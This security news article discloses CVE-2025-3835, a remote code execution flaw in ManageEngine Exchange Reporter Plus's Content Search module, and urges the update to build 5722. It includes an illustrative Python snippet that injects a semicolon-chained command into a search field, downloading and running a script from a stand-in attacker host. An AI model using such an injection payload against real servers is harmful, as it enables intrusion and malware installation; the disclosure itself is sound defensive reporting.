A critical security vulnerability has been disclosed in ManageEngine’s Exchange Reporter Plus, a popular enterprise solution for monitoring and reporting on Microsoft Exchange environments.
Tracked as CVE-2025-3835, this flaw exposes organizations to remote code execution (RCE) risks, enabling attackers to execute arbitrary commands on affected servers.
The issue has been credited to researcher Ngockhanhc311 from FPT NightWolf and has been addressed by ManageEngine in a recent update.
Severity:
Critical
Affected Versions:
Build 5721 and below
Fixed Version:
Build 5722 (released May 29, 2025)
Affected Component:
Content Search Module
The vulnerability resides within the Content Search module of Exchange Reporter Plus.
This module is designed to allow administrators to perform content searches across Exchange mailboxes, a process that typically involves processing user input for search terms and scope.
Under rare but exploitable scenarios, an attacker could leverage inadequately sanitized input fields to inject malicious payloads.
Attack Path:
Example: Hypothetical Exploit Code
While the exact exploit code has not been publicly released, the following demonstrates how such an RCE might be structured in principle for a vulnerable web application:
pythonimport requests
# URL of the vulnerable Exchange Reporter Plus web endpoint
url = "https://[TARGET_IP]/searchapi"
# Crafted payload that appends a command to the input
payload = {
"searchTerm": "test;wget http://attacker.com/malware.sh -O /tmp/malware.sh && sh /tmp/malware.sh"
}
response = requests.post(url, data=payload)
print(response.text)
Note:
This example is illustrative. The actual exploit depends on the backend’s handling of command delimiters (such as semicolons or pipes) and whether these characters are properly escaped.
Impact and Risks
Immediate Action:
Given the critical nature of this vulnerability, organizations are urged to update Exchange Reporter Plus to build 5722 (released on May 29, 2025) at the earliest opportunity.
Steps to Update:
Assistance:
For detailed instructions or support, contact ManageEngine’s product support at support@exchangereporterplus.com.
The discovery and prompt remediation of CVE-2025-3835 underscore the importance of robust security practices in enterprise software.
ManageEngine’s swift response has minimized the window of risk for organizations using Exchange Reporter Plus.
However, this incident serves as a stark reminder of the dangers posed by remote code execution vulnerabilities and the need for continuous vigilance in software deployment and management.
PortSwigger has leveled up Burp Suite's scanning arsenal with the latest Active Scan++ extension, version…
Unit 42 researchers at Palo Alto Networks exposed serious flaws in the Model Context Protocol…
Polish police have arrested three Ukrainian men traveling through Europe and seized a cache of…
Google has launched its most significant Chrome update ever, embedding Gemini AI across the browser…
Attackers exploit this vulnerability through the router's web interface components, specifically "cgibin" and "hnap_main," by…
Security researchers have uncovered a severe flaw in Apache Tika, a popular open-source toolkit for…